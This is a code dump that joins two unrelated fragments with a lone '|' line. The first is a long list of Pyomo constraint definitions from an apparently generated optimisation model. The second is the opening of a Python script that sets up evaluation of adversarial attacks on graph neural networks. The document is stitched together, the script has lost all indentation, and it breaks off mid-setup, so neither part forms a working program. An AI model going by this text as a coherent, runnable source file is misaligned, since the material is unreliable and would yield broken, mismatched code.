m.c692 = Constraint(expr= m.x52 + 9*m.b596 == 0)
m.c693 = Constraint(expr= m.x53 + 10*m.b597 == 0)
m.c694 = Constraint(expr= m.x54 + 2*m.b598 == 0)
m.c695 = Constraint(expr= m.x55 + 6*m.b599 == 0)
m.c696 = Constraint(expr= m.x56 + 3*m.b600 == 0)
m.c697 = Constraint(expr= m.x57 + 7*m.b601 == 0)
m.c698 = Constraint(expr= m.x58 + 4*m.b602 == 0)
m.c699 = Constraint(expr= m.x59 + 8*m.b603 == 0)
m.c700 = Constraint(expr= m.x60 + m.b604 == 0)
m.c701 = Constraint(expr= m.x61 + 4*m.b605 == 0)
m.c702 = Constraint(expr= m.b486 - m.b487 <= 0)
m.c703 = Constraint(expr= m.b486 - m.b488 <= 0)
m.c704 = Constraint(expr= m.b486 - m.b489 <= 0)
m.c705 = Constraint(expr= m.b487 - m.b488 <= 0)
m.c706 = Constraint(expr= m.b487 - m.b489 <= 0)
m.c707 = Constraint(expr= m.b488 - m.b489 <= 0)
m.c708 = Constraint(expr= m.b490 - m.b491 <= 0)
m.c709 = Constraint(expr= m.b490 - m.b492 <= 0)
m.c710 = Constraint(expr= m.b490 - m.b493 <= 0)
m.c711 = Constraint(expr= m.b491 - m.b492 <= 0)
m.c712 = Constraint(expr= m.b491 - m.b493 <= 0)
m.c713 = Constraint(expr= m.b492 - m.b493 <= 0)
m.c714 = Constraint(expr= m.b494 - m.b495 <= 0)
m.c715 = Constraint(expr= m.b494 - m.b496 <= 0)
m.c716 = Constraint(expr= m.b494 - m.b497 <= 0)
m.c717 = Constraint(expr= m.b495 - m.b496 <= 0)
m.c718 = Constraint(expr= m.b495 - m.b497 <= 0)
m.c719 = Constraint(expr= m.b496 - m.b497 <= 0)
m.c720 = Constraint(expr= m.b498 - m.b499 <= 0)
m.c721 = Constraint(expr= m.b498 - m.b500 <= 0)
m.c722 = Constraint(expr= m.b498 - m.b501 <= 0)
m.c723 = Constraint(expr= m.b499 - m.b500 <= 0)
m.c724 = Constraint(expr= m.b499 - m.b501 <= 0)
m.c725 = Constraint(expr= m.b500 - m.b501 <= 0)
m.c726 = Constraint(expr= m.b502 - m.b503 <= 0)
m.c727 = Constraint(expr= m.b502 - m.b504 <= 0)
m.c728 = Constraint(expr= m.b502 - m.b505 <= 0)
m.c729 = Constraint(expr= m.b503 - m.b504 <= 0)
m.c730 = Constraint(expr= m.b503 - m.b505 <= 0)
m.c731 = Constraint(expr= m.b504 - m.b505 <= 0)
m.c732 = Constraint(expr= m.b506 - m.b507 <= 0)
m.c733 = Constraint(expr= m.b506 - m.b508 <= 0)
m.c734 = Constraint(expr= m.b506 - m.b509 <= 0)
m.c735 = Constraint(expr= m.b507 - m.b508 <= 0)
m.c736 = Constraint(expr= m.b507 - m.b509 <= 0)
m.c737 = Constraint(expr= m.b508 - m.b509 <= 0)
m.c738 = Constraint(expr= m.b510 - m.b511 <= 0)
m.c739 = Constraint(expr= m.b510 - m.b512 <= 0)
m.c740 = Constraint(expr= m.b510 - m.b513 <= 0)
m.c741 = Constraint(expr= m.b511 - m.b512 <= 0)
m.c742 = Constraint(expr= m.b511 - m.b513 <= 0)
m.c743 = Constraint(expr= m.b512 - m.b513 <= 0)
m.c744 = Constraint(expr= m.b514 - m.b515 <= 0)
m.c745 = Constraint(expr= m.b514 - m.b516 <= 0)
m.c746 = Constraint(expr= m.b514 - m.b517 <= 0)
m.c747 = Constraint(expr= m.b515 - m.b516 <= 0)
m.c748 = Constraint(expr= m.b515 - m.b517 <= 0)
m.c749 = Constraint(expr= m.b516 - m.b517 <= 0)
m.c750 = Constraint(expr= m.b518 - m.b519 <= 0)
m.c751 = Constraint(expr= m.b518 - m.b520 <= 0)
m.c752 = Constraint(expr= m.b518 - m.b521 <= 0)
m.c753 = Constraint(expr= m.b519 - m.b520 <= 0)
m.c754 = Constraint(expr= m.b519 - m.b521 <= 0)
m.c755 = Constraint(expr= m.b520 - m.b521 <= 0)
m.c756 = Constraint(expr= m.b522 - m.b523 <= 0)
m.c757 = Constraint(expr= m.b522 - m.b524 <= 0)
m.c758 = Constraint(expr= m.b522 - m.b525 <= 0)
m.c759 = Constraint(expr= m.b523 - m.b524 <= 0)
m.c760 = Constraint(expr= m.b523 - m.b525 <= 0)
m.c761 = Constraint(expr= m.b524 - m.b525 <= 0)
m.c762 = Constraint(expr= m.b526 - m.b527 <= 0)
m.c763 = Constraint(expr= m.b526 - m.b528 <= 0)
m.c764 = Constraint(expr= m.b526 - m.b529 <= 0)
m.c765 = Constraint(expr= m.b527 - m.b528 <= 0)
m.c766 = Constraint(expr= m.b527 - m.b529 <= 0)
m.c767 = Constraint(expr= m.b528 - m.b529 <= 0)
m.c768 = Constraint(expr= m.b530 - m.b531 <= 0)
m.c769 = Constraint(expr= m.b530 - m.b532 <= 0)
m.c770 = Constraint(expr= m.b530 - m.b533 <= 0)
m.c771 = Constraint(expr= m.b531 - m.b532 <= 0)
m.c772 = Constraint(expr= m.b531 - m.b533 <= 0)
m.c773 = Constraint(expr= m.b532 - m.b533 <= 0)
m.c774 = Constraint(expr= m.b534 - m.b535 <= 0)
m.c775 = Constraint(expr= m.b534 - m.b536 <= 0)
m.c776 = Constraint(expr= m.b534 - m.b537 <= 0)
m.c777 = Constraint(expr= m.b535 - m.b536 <= 0)
m.c778 = Constraint(expr= m.b535 - m.b537 <= 0)
m.c779 = Constraint(expr= m.b536 - m.b537 <= 0)
m.c780 = Constraint(expr= m.b538 - m.b539 <= 0)
m.c781 = Constraint(expr= m.b538 - m.b540 <= 0)
m.c782 = Constraint(expr= m.b538 - m.b541 <= 0)
m.c783 = Constraint(expr= m.b539 - m.b540 <= 0)
m.c784 = Constraint(expr= m.b539 - m.b541 <= 0)
m.c785 = Constraint(expr= m.b540 - m.b541 <= 0)
m.c786 = Constraint(expr= m.b542 - m.b543 <= 0)
m.c787 = Constraint(expr= m.b542 - m.b544 <= 0)
m.c788 = Constraint(expr= m.b542 - m.b545 <= 0)
m.c789 = Constraint(expr= m.b543 - m.b544 <= 0)
m.c790 = Constraint(expr= m.b543 - m.b545 <= 0)
m.c791 = Constraint(expr= m.b544 - m.b545 <= 0)
m.c792 = Constraint(expr= m.b546 + m.b547 <= 1)
m.c793 = Constraint(expr= m.b546 + m.b548 <= 1)
m.c794 = Constraint(expr= m.b546 + m.b549 <= 1)
m.c795 = Constraint(expr= m.b546 + m.b547 <= 1)
m.c796 = Constraint(expr= m.b547 + m.b548 <= 1)
m.c797 = Constraint(expr= m.b547 + m.b549 <= 1)
m.c798 = Constraint(expr= m.b546 + m.b548 <= 1)
m.c799 = Constraint(expr= m.b547 + m.b548 <= 1)
m.c800 = Constraint(expr= m.b548 + m.b549 <= 1)
m.c801 = Constraint(expr= m.b546 + m.b549 <= 1)
m.c802 = Constraint(expr= m.b547 + m.b549 <= 1)
m.c803 = Constraint(expr= m.b548 + m.b549 <= 1)
m.c804 = Constraint(expr= m.b550 + m.b551 <= 1)
m.c805 = Constraint(expr= m.b550 + m.b552 <= 1)
m.c806 = Constraint(expr= m.b550 + m.b553 <= 1)
m.c807 = Constraint(expr= m.b550 + m.b551 <= 1)
m.c808 = Constraint(expr= m.b551 + m.b552 <= 1)
m.c809 = Constraint(expr= m.b551 + m.b553 <= 1)
m.c810 = Constraint(expr= m.b550 + m.b552 <= 1)
m.c811 = Constraint(expr= m.b551 + m.b552 <= 1)
m.c812 = Constraint(expr= m.b552 + m.b553 <= 1)
m.c813 = Constraint(expr= m.b550 + m.b553 <= 1)
m.c814 = Constraint(expr= m.b551 + m.b553 <= 1)
m.c815 = Constraint(expr= m.b552 + m.b553 <= 1)
m.c816 = Constraint(expr= m.b554 + m.b555 <= 1)
m.c817 = Constraint(expr= m.b554 + m.b556 <= 1)
m.c818 = Constraint(expr= m.b554 + m.b557 <= 1)
m.c819 = Constraint(expr= m.b554 + m.b555 <= 1)
m.c820 = Constraint(expr= m.b555 + m.b556 <= 1)
m.c821 = Constraint(expr= m.b555 + m.b557 <= 1)
m.c822 = Constraint(expr= m.b554 + m.b556 <= 1)
m.c823 = Constraint(expr= m.b555 + m.b556 <= 1)
m.c824 = Constraint(expr= m.b556 + m.b557 <= 1)
m.c825 = Constraint(expr= m.b554 + m.b557 <= 1)
m.c826 = Constraint(expr= m.b555 + m.b557 <= 1)
m.c827 = Constraint(expr= m.b556 + m.b557 <= 1)
m.c828 = Constraint(expr= m.b558 + m.b559 <= 1)
m.c829 = Constraint(expr= m.b558 + m.b560 <= 1)
m.c830 = Constraint(expr= m.b558 + m.b561 <= 1)
m.c831 = Constraint(expr= m.b558 + m.b559 <= 1)
m.c832 = Constraint(expr= m.b559 + m.b560 <= 1)
m.c833 = Constraint(expr= m.b559 + m.b561 <= 1)
m.c834 = Constraint(expr= m.b558 + m.b560 <= 1)
m.c835 = Constraint(expr= m.b559 + m.b560 <= 1)
m.c836 = Constraint(expr= m.b560 + m.b561 <= 1)
m.c837 = Constraint(expr= m.b558 + m.b561 <= 1)
m.c838 = Constraint(expr= m.b559 + m.b561 <= 1)
m.c839 = Constraint(expr= m.b560 + m.b561 <= 1)
m.c840 = Constraint(expr= m.b562 + m.b563 <= 1)
m.c841 = Constraint(expr= m.b562 + m.b564 <= 1)
m.c842 = Constraint(expr= m.b562 + m.b565 <= 1)
m.c843 = Constraint(expr= m.b562 + m.b563 <= 1)
m.c844 = Constraint(expr= m.b563 + m.b564 <= 1)
m.c845 = Constraint(expr= m.b563 + m.b565 <= 1)
m.c846 = Constraint(expr= m.b562 + m.b564 <= 1)
m.c847 = Constraint(expr= m.b563 + m.b564 <= 1)
m.c848 = Constraint(expr= m.b564 + m.b565 <= 1)
m.c849 = Constraint(expr= m.b562 + m.b565 <= 1)
m.c850 = Constraint(expr= m.b563 + m.b565 <= 1)
m.c851 = Constraint(expr= m.b564 + m.b565 <= 1)
m.c852 = Constraint(expr= m.b566 + m.b567 <= 1)
m.c853 = Constraint(expr= m.b566 + m.b568 <= 1)
m.c854 = Constraint(expr= m.b566 + m.b569 <= 1)
m.c855 = Constraint(expr= m.b566 + m.b567 <= 1)
m.c856 = Constraint(expr= m.b567 + m.b568 <= 1)
m.c857 = Constraint(expr= m.b567 + m.b569 <= 1)
m.c858 = Constraint(expr= m.b566 + m.b568 <= 1)
m.c859 = Constraint(expr= m.b567 + m.b568 <= 1)
m.c860 = Constraint(expr= m.b568 + m.b569 <= 1)
m.c861 = Constraint(expr= m.b566 + m.b569 <= 1)
m.c862 = Constraint(expr= m.b567 + m.b569 <= 1)
m.c863 = Constraint(expr= m.b568 + m.b569 <= 1)
m.c864 = Constraint(expr= m.b570 + m.b571 <= 1)
m.c865 = Constraint(expr= m.b570 + m.b572 <= 1)
m.c866 = Constraint(expr= m.b570 + m.b573 <= 1)
m.c867 = Constraint(expr= m.b570 + m.b571 <= 1)
m.c868 = Constraint(expr= m.b571 + m.b572 <= 1)
m.c869 = Constraint(expr= m.b571 + m.b573 <= 1)
m.c870 = Constraint(expr= m.b570 + m.b572 <= 1)
m.c871 = Constraint(expr= m.b571 + m.b572 <= 1)
m.c872 = Constraint(expr= m.b572 + m.b573 <= 1)
m.c873 = Constraint(expr= m.b570 + m.b573 <= 1)
m.c874 = Constraint(expr= m.b571 + m.b573 <= 1)
m.c875 = Constraint(expr= m.b572 + m.b573 <= 1)
m.c876 = Constraint(expr= m.b574 + m.b575 <= 1)
m.c877 = Constraint(expr= m.b574 + m.b576 <= 1)
m.c878 = Constraint(expr= m.b574 + m.b577 <= 1)
m.c879 = Constraint(expr= m.b574 + m.b575 <= 1)
m.c880 = Constraint(expr= m.b575 + m.b576 <= 1)
m.c881 = Constraint(expr= m.b575 + m.b577 <= 1)
m.c882 = Constraint(expr= m.b574 + m.b576 <= 1)
m.c883 = Constraint(expr= m.b575 + m.b576 <= 1)
m.c884 = Constraint(expr= m.b576 + m.b577 <= 1)
m.c885 = Constraint(expr= m.b574 + m.b577 <= 1)
m.c886 = Constraint(expr= m.b575 + m.b577 <= 1)
m.c887 = Constraint(expr= m.b576 + m.b577 <= 1)
m.c888 = Constraint(expr= m.b578 + m.b579 <= 1)
m.c889 = Constraint(expr= m.b578 + m.b580 <= 1)
m.c890 = Constraint(expr= m.b578 + m.b581 <= 1)
m.c891 = Constraint(expr= m.b578 + m.b579 <= 1)
m.c892 = Constraint(expr= m.b579 + m.b580 <= 1)
m.c893 = Constraint(expr= m.b579 + m.b581 <= 1)
m.c894 = Constraint(expr= m.b578 + m.b580 <= 1)
m.c895 = Constraint(expr= m.b579 + m.b580 <= 1)
m.c896 = Constraint(expr= m.b580 + m.b581 <= 1)
m.c897 = Constraint(expr= m.b578 + m.b581 <= 1)
m.c898 = Constraint(expr= m.b579 + m.b581 <= 1)
m.c899 = Constraint(expr= m.b580 + m.b581 <= 1)
m.c900 = Constraint(expr= m.b582 + m.b583 <= 1)
m.c901 = Constraint(expr= m.b582 + m.b584 <= 1)
m.c902 = Constraint(expr= m.b582 + m.b585 <= 1)
m.c903 = Constraint(expr= m.b582 + m.b583 <= 1)
m.c904 = Constraint(expr= m.b583 + m.b584 <= 1)
m.c905 = Constraint(expr= m.b583 + m.b585 <= 1)
m.c906 = Constraint(expr= m.b582 + m.b584 <= 1)
m.c907 = Constraint(expr= m.b583 + m.b584 <= 1)
m.c908 = Constraint(expr= m.b584 + m.b585 <= 1)
m.c909 = Constraint(expr= m.b582 + m.b585 <= 1)
m.c910 = Constraint(expr= m.b583 + m.b585 <= 1)
m.c911 = Constraint(expr= m.b584 + m.b585 <= 1)
m.c912 = Constraint(expr= m.b586 + m.b587 <= 1)
m.c913 = Constraint(expr= m.b586 + m.b588 <= 1)
m.c914 = Constraint(expr= m.b586 + m.b589 <= 1)
m.c915 = Constraint(expr= m.b586 + m.b587 <= 1)
m.c916 = Constraint(expr= m.b587 + m.b588 <= 1)
m.c917 = Constraint(expr= m.b587 + m.b589 <= 1)
m.c918 = Constraint(expr= m.b586 + m.b588 <= 1)
m.c919 = Constraint(expr= m.b587 + m.b588 <= 1)
m.c920 = Constraint(expr= m.b588 + m.b589 <= 1)
m.c921 = Constraint(expr= m.b586 + m.b589 <= 1)
m.c922 = Constraint(expr= m.b587 + m.b589 <= 1)
m.c923 = Constraint(expr= m.b588 + m.b589 <= 1)
m.c924 = Constraint(expr= m.b590 + m.b591 <= 1)
m.c925 = Constraint(expr= m.b590 + m.b592 <= 1)
m.c926 = Constraint(expr= m.b590 + m.b593 <= 1)
m.c927 = Constraint(expr= m.b590 + m.b591 <= 1)
m.c928 = Constraint(expr= m.b591 + m.b592 <= 1)
m.c929 = Constraint(expr= m.b591 + m.b593 <= 1)
m.c930 = Constraint(expr= m.b590 + m.b592 <= 1)
m.c931 = Constraint(expr= m.b591 + m.b592 <= 1)
m.c932 = Constraint(expr= m.b592 + m.b593 <= 1)
m.c933 = Constraint(expr= m.b590 + m.b593 <= 1)
m.c934 = Constraint(expr= m.b591 + m.b593 <= 1)
m.c935 = Constraint(expr= m.b592 + m.b593 <= 1)
m.c936 = Constraint(expr= m.b594 + m.b595 <= 1)
m.c937 = Constraint(expr= m.b594 + m.b596 <= 1)
m.c938 = Constraint(expr= m.b594 + m.b597 <= 1)
m.c939 = Constraint(expr= m.b594 + m.b595 <= 1)
m.c940 = Constraint(expr= m.b595 + m.b596 <= 1)
m.c941 = Constraint(expr= m.b595 + m.b597 <= 1)
m.c942 = Constraint(expr= m.b594 + m.b596 <= 1)
m.c943 = Constraint(expr= m.b595 + m.b596 <= 1)
m.c944 = Constraint(expr= m.b596 + m.b597 <= 1)
m.c945 = Constraint(expr= m.b594 + m.b597 <= 1)
m.c946 = Constraint(expr= m.b595 + m.b597 <= 1)
m.c947 = Constraint(expr= m.b596 + m.b597 <= 1)
m.c948 = Constraint(expr= m.b598 + m.b599 <= 1)
m.c949 = Constraint(expr= m.b598 + m.b600 <= 1)
m.c950 = Constraint(expr= m.b598 + m.b601 <= 1)
m.c951 = Constraint(expr= m.b598 + m.b599 <= 1)
m.c952 = Constraint(expr= m.b599 + m.b600 <= 1)
m.c953 = Constraint(expr= m.b599 + m.b601 <= 1)
m.c954 = Constraint(expr= m.b598 + m.b600 <= 1)
m.c955 = Constraint(expr= m.b599 + m.b600 <= 1)
m.c956 = Constraint(expr= m.b600 + m.b601 <= 1)
m.c957 = Constraint(expr= m.b598 + m.b601 <= 1)
m.c958 = Constraint(expr= m.b599 + m.b601 <= 1)
m.c959 = Constraint(expr= m.b600 + m.b601 <= 1)
m.c960 = Constraint(expr= m.b602 + m.b603 <= 1)
m.c961 = Constraint(expr= m.b602 + m.b604 <= 1)
m.c962 = Constraint(expr= m.b602 + m.b605 <= 1)
m.c963 = Constraint(expr= m.b602 + m.b603 <= 1)
m.c964 = Constraint(expr= m.b603 + m.b604 <= 1)
m.c965 = Constraint(expr= m.b603 + m.b605 <= 1)
m.c966 = Constraint(expr= m.b602 + m.b604 <= 1)
m.c967 = Constraint(expr= m.b603 + m.b604 <= 1)
m.c968 = Constraint(expr= m.b604 + m.b605 <= 1)
m.c969 = Constraint(expr= m.b602 + m.b605 <= 1)
m.c970 = Constraint(expr= m.b603 + m.b605 <= 1)
m.c971 = Constraint(expr= m.b604 + m.b605 <= 1)
m.c972 = Constraint(expr= m.b486 - m.b546 <= 0)
m.c973 = Constraint(expr= - m.b486 + m.b487 - m.b547 <= 0)
m.c974 = Constraint(expr= - m.b486 - m.b487 + m.b488 - m.b548 <= 0)
m.c975 = Constraint(expr= - m.b486 - m.b487 - m.b488 + m.b489 - m.b549 <= 0)
m.c976 = Constraint(expr= m.b490 - m.b550 <= 0)
m.c977 = Constraint(expr= - m.b490 + m.b491 - m.b551 <= 0)
m.c978 = Constraint(expr= - m.b490 - m.b491 + m.b492 - m.b552 <= 0)
m.c979 = Constraint(expr= - m.b490 - m.b491 - m.b492 + m.b493 - m.b553 <= 0)
m.c980 = Constraint(expr= m.b494 - m.b554 <= 0)
m.c981 = Constraint(expr= - m.b494 + m.b495 - m.b555 <= 0)
m.c982 = Constraint(expr= - m.b494 - m.b495 + m.b496 - m.b556 <= 0)
m.c983 = Constraint(expr= - m.b494 - m.b495 - m.b496 + m.b497 - m.b557 <= 0)
m.c984 = Constraint(expr= m.b498 - m.b558 <= 0)
m.c985 = Constraint(expr= - m.b498 + m.b499 - m.b559 <= 0)
m.c986 = Constraint(expr= - m.b498 - m.b499 + m.b500 - m.b560 <= 0)
m.c987 = Constraint(expr= - m.b498 - m.b499 - m.b500 + m.b501 - m.b561 <= 0)
m.c988 = Constraint(expr= m.b502 - m.b562 <= 0)
m.c989 = Constraint(expr= - m.b502 + m.b503 - m.b563 <= 0)
m.c990 = Constraint(expr= - m.b502 - m.b503 + m.b504 - m.b564 <= 0)
m.c991 = Constraint(expr= - m.b502 - m.b503 - m.b504 + m.b505 - m.b565 <= 0)
m.c992 = Constraint(expr= m.b506 - m.b566 <= 0)
m.c993 = Constraint(expr= - m.b506 + m.b507 - m.b567 <= 0)
m.c994 = Constraint(expr= - m.b506 - m.b507 + m.b508 - m.b568 <= 0)
m.c995 = Constraint(expr= - m.b506 - m.b507 - m.b508 + m.b509 - m.b569 <= 0)
m.c996 = Constraint(expr= m.b510 - m.b570 <= 0)
m.c997 = Constraint(expr= - m.b510 + m.b511 - m.b571 <= 0)
m.c998 = Constraint(expr= - m.b510 - m.b511 + m.b512 - m.b572 <= 0)
m.c999 = Constraint(expr= - m.b510 - m.b511 - m.b512 + m.b513 - m.b573 <= 0)
m.c1000 = Constraint(expr= m.b514 - m.b574 <= 0)
m.c1001 = Constraint(expr= - m.b514 + m.b515 - m.b575 <= 0)
m.c1002 = Constraint(expr= - m.b514 - m.b515 + m.b516 - m.b576 <= 0)
m.c1003 = Constraint(expr= - m.b514 - m.b515 - m.b516 + m.b517 - m.b577 <= 0)
m.c1004 = Constraint(expr= m.b518 - m.b578 <= 0)
m.c1005 = Constraint(expr= - m.b518 + m.b519 - m.b579 <= 0)
m.c1006 = Constraint(expr= - m.b518 - m.b519 + m.b520 - m.b580 <= 0)
m.c1007 = Constraint(expr= - m.b518 - m.b519 - m.b520 + m.b521 - m.b581 <= 0)
m.c1008 = Constraint(expr= m.b522 - m.b582 <= 0)
m.c1009 = Constraint(expr= - m.b522 + m.b523 - m.b583 <= 0)
m.c1010 = Constraint(expr= - m.b522 - m.b523 + m.b524 - m.b584 <= 0)
m.c1011 = Constraint(expr= - m.b522 - m.b523 - m.b524 + m.b525 - m.b585 <= 0)
m.c1012 = Constraint(expr= m.b526 - m.b586 <= 0)
m.c1013 = Constraint(expr= - m.b526 + m.b527 - m.b587 <= 0)
m.c1014 = Constraint(expr= - m.b526 - m.b527 + m.b528 - m.b588 <= 0)
m.c1015 = Constraint(expr= - m.b526 - m.b527 - m.b528 + m.b529 - m.b589 <= 0)
m.c1016 = Constraint(expr= m.b530 - m.b590 <= 0)
m.c1017 = Constraint(expr= - m.b530 + m.b531 - m.b591 <= 0)
m.c1018 = Constraint(expr= - m.b530 - m.b531 + m.b532 - m.b592 <= 0)
m.c1019 = Constraint(expr= - m.b530 - m.b531 - m.b532 + m.b533 - m.b593 <= 0)
m.c1020 = Constraint(expr= m.b534 - m.b594 <= 0)
m.c1021 = Constraint(expr= - m.b534 + m.b535 - m.b595 <= 0)
m.c1022 = Constraint(expr= - m.b534 - m.b535 + m.b536 - m.b596 <= 0)
m.c1023 = Constraint(expr= - m.b534 - m.b535 - m.b536 + m.b537 - m.b597 <= 0)
m.c1024 = Constraint(expr= m.b538 - m.b598 <= 0)
m.c1025 = Constraint(expr= - m.b538 + m.b539 - m.b599 <= 0)
m.c1026 = Constraint(expr= - m.b538 - m.b539 + m.b540 - m.b600 <= 0)
m.c1027 = Constraint(expr= - m.b538 - m.b539 - m.b540 + m.b541 - m.b601 <= 0)
m.c1028 = Constraint(expr= m.b542 - m.b602 <= 0)
m.c1029 = Constraint(expr= - m.b542 + m.b543 - m.b603 <= 0)
m.c1030 = Constraint(expr= - m.b542 - m.b543 + m.b544 - m.b604 <= 0)
m.c1031 = Constraint(expr= - m.b542 - m.b543 - m.b544 + m.b545 - m.b605 <= 0)
m.c1032 = Constraint(expr= m.b486 + m.b490 == 1)
m.c1033 = Constraint(expr= m.b487 + m.b491 == 1)
m.c1034 = Constraint(expr= m.b488 + m.b492 == 1)
m.c1035 = Constraint(expr= m.b489 + m.b493 == 1)
m.c1036 = Constraint(expr= - m.b494 + m.b506 + m.b510 >= 0)
m.c1037 = Constraint(expr= - m.b495 + m.b507 + m.b511 >= 0)
m.c1038 = Constraint(expr= - m.b496 + m.b508 + m.b512 >= 0)
m.c1039 = Constraint(expr= - m.b497 + m.b509 + m.b513 >= 0)
m.c1040 = Constraint(expr= - m.b506 + m.b530 >= 0)
m.c1041 = Constraint(expr= - m.b507 + m.b531 >= 0)
m.c1042 = Constraint(expr= - m.b508 + m.b532 >= 0)
m.c1043 = Constraint(expr= - m.b509 + m.b533 >= 0)
m.c1044 = Constraint(expr= - m.b510 + m.b534 >= 0)
m.c1045 = Constraint(expr= - m.b511 + m.b535 >= 0)
m.c1046 = Constraint(expr= - m.b512 + m.b536 >= 0)
m.c1047 = Constraint(expr= - m.b513 + m.b537 >= 0)
m.c1048 = Constraint(expr= - m.b498 + m.b514 >= 0)
m.c1049 = Constraint(expr= - m.b499 + m.b515 >= 0)
m.c1050 = Constraint(expr= - m.b500 + m.b516 >= 0)
m.c1051 = Constraint(expr= - m.b501 + m.b517 >= 0)
m.c1052 = Constraint(expr= - m.b514 + m.b538 + m.b542 >= 0)
m.c1053 = Constraint(expr= - m.b515 + m.b539 + m.b543 >= 0)
m.c1054 = Constraint(expr= - m.b516 + m.b540 + m.b544 >= 0)
m.c1055 = Constraint(expr= - m.b517 + m.b541 + m.b545 >= 0)
m.c1056 = Constraint(expr= - m.b502 + m.b518 + m.b522 + m.b526 >= 0)
m.c1057 = Constraint(expr= - m.b503 + m.b519 + m.b523 + m.b527 >= 0)
m.c1058 = Constraint(expr= - m.b504 + m.b520 + m.b524 + m.b528 >= 0)
m.c1059 = Constraint(expr= - m.b505 + m.b521 + m.b525 + m.b529 >= 0)
m.c1060 = Constraint(expr= - m.b518 + m.b542 >= 0)
m.c1061 = Constraint(expr= - m.b519 + m.b543 >= 0)
m.c1062 = Constraint(expr= - m.b520 + m.b544 >= 0)
m.c1063 = Constraint(expr= - m.b521 + m.b545 >= 0)
m.c1064 = Constraint(expr= m.b486 + m.b490 - m.b494 >= 0)
m.c1065 = Constraint(expr= m.b487 + m.b491 - m.b495 >= 0)
m.c1066 = Constraint(expr= m.b488 + m.b492 - m.b496 >= 0)
m.c1067 = Constraint(expr= m.b489 + m.b493 - m.b497 >= 0)
m.c1068 = Constraint(expr= m.b486 + m.b490 - m.b498 >= 0)
m.c1069 = Constraint(expr= m.b487 + m.b491 - m.b499 >= 0)
m.c1070 = Constraint(expr= m.b488 + m.b492 - m.b500 >= 0)
m.c1071 = Constraint(expr= m.b489 + m.b493 - m.b501 >= 0)
m.c1072 = Constraint(expr= m.b486 + m.b490 - m.b502 >= 0)
m.c1073 = Constraint(expr= m.b487 + m.b491 - m.b503 >= 0)
m.c1074 = Constraint(expr= m.b488 + m.b492 - m.b504 >= 0)
m.c1075 = Constraint(expr= m.b489 + m.b493 - m.b505 >= 0)
m.c1076 = Constraint(expr= m.b494 - m.b506 >= 0)
m.c1077 = Constraint(expr= m.b495 - m.b507 >= 0)
m.c1078 = Constraint(expr= m.b496 - m.b508 >= 0)
m.c1079 = Constraint(expr= m.b497 - m.b509 >= 0)
m.c1080 = Constraint(expr= m.b494 - m.b510 >= 0)
m.c1081 = Constraint(expr= m.b495 - m.b511 >= 0)
m.c1082 = Constraint(expr= m.b496 - m.b512 >= 0)
m.c1083 = Constraint(expr= m.b497 - m.b513 >= 0)
m.c1084 = Constraint(expr= m.b498 - m.b514 >= 0)
m.c1085 = Constraint(expr= m.b499 - m.b515 >= 0)
m.c1086 = Constraint(expr= m.b500 - m.b516 >= 0)
m.c1087 = Constraint(expr= m.b501 - m.b517 >= 0)
m.c1088 = Constraint(expr= m.b502 - m.b518 >= 0)
m.c1089 = Constraint(expr= m.b503 - m.b519 >= 0)
m.c1090 = Constraint(expr= m.b504 - m.b520 >= 0)
m.c1091 = Constraint(expr= m.b505 - m.b521 >= 0)
m.c1092 = Constraint(expr= m.b502 - m.b522 >= 0)
m.c1093 = Constraint(expr= m.b503 - m.b523 >= 0)
m.c1094 = Constraint(expr= m.b504 - m.b524 >= 0)
m.c1095 = Constraint(expr= m.b505 - m.b525 >= 0)
m.c1096 = Constraint(expr= m.b502 - m.b526 >= 0)
m.c1097 = Constraint(expr= m.b503 - m.b527 >= 0)
m.c1098 = Constraint(expr= m.b504 - m.b528 >= 0)
m.c1099 = Constraint(expr= m.b505 - m.b529 >= 0)
m.c1100 = Constraint(expr= m.b506 - m.b530 >= 0)
m.c1101 = Constraint(expr= m.b507 - m.b531 >= 0)
m.c1102 = Constraint(expr= m.b508 - m.b532 >= 0)
m.c1103 = Constraint(expr= m.b509 - m.b533 >= 0)
m.c1104 = Constraint(expr= m.b510 - m.b534 >= 0)
m.c1105 = Constraint(expr= m.b511 - m.b535 >= 0)
m.c1106 = Constraint(expr= m.b512 - m.b536 >= 0)
m.c1107 = Constraint(expr= m.b513 - m.b537 >= 0)
m.c1108 = Constraint(expr= m.b514 - m.b538 >= 0)
m.c1109 = Constraint(expr= m.b515 - m.b539 >= 0)
m.c1110 = Constraint(expr= m.b516 - m.b540 >= 0)
m.c1111 = Constraint(expr= m.b517 - m.b541 >= 0)
m.c1112 = Constraint(expr= m.b514 - m.b542 >= 0)
m.c1113 = Constraint(expr= m.b515 - m.b543 >= 0)
m.c1114 = Constraint(expr= m.b516 - m.b544 >= 0)
m.c1115 = Constraint(expr= m.b517 - m.b545 >= 0)
|
import argparse
import os
import pickle
import sys
import numpy as np
import pandas as pd
import scipy.sparse as sp
sys.path.append('../')
import grb.utils as utils
from grb.dataset import Dataset
from grb.evaluator import AttackEvaluator
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluating adversarial attack against GNNs')
parser.add_argument("--gpu", type=int, default=0, help="gpu")
parser.add_argument("--dataset", type=str, default="grb-cora")
parser.add_argument("--dataset_mode", nargs='+', default=["easy", "medium", "hard", "full"])
parser.add_argument("--feat_norm", type=str, default=None)
parser.add_argument("--data_dir", type=str, default="../data/grb-cora/")
parser.add_argument("--model", nargs='+', default=None)
parser.add_argument("--model_dir", type=str, default="../saved_models/grb-cora/")
parser.add_argument("--model_file", type=str, default="checkpoint.pt")
parser.add_argument("--config_dir", type=str, default="./grb-cora")
parser.add_argument("--attack_dir", type=str, default="../results/grb-cora/")
parser.add_argument("--attack_adj_name", type=str, default="adj.pkl")
parser.add_argument("--attack_feat_name", type=str, default="features.npy")
parser.add_argument("--weight_type", type=str, default="polynomial",
help="Type of weighted accuracy, 'polynomial' or 'arithmetic'.")
parser.add_argument("--save_dir", type=str, default=None)
args = parser.parse_args()
if args.gpu >= 0:
device = "cuda:{}".format(args.gpu)
else:
device = "cpu"
sys.path.append(args.config_dir)
import config
result_dict = {"no_attack": {}}
if args.attack_dir:
for attack_name in config.attack_list:
result_dict[attack_name] = {}
for dataset_mode in args.dataset_mode:
dataset = Dataset(name=args.dataset,
data_dir=args.data_dir,
mode=dataset_mode,
feat_norm=args.feat_norm,
verbose=True)
adj = dataset.adj
features = dataset.features
labels = dataset.labels
num_nodes = dataset.num_nodes
num_features = dataset.num_features
num_classes = dataset.num_classes
train_mask = dataset.train_mask
val_mask = dataset.val_mask
test_mask = dataset.test_mask
if args.model is not None:
model_list = args.model
else:
model_list = config.model_list
model_dict = {}
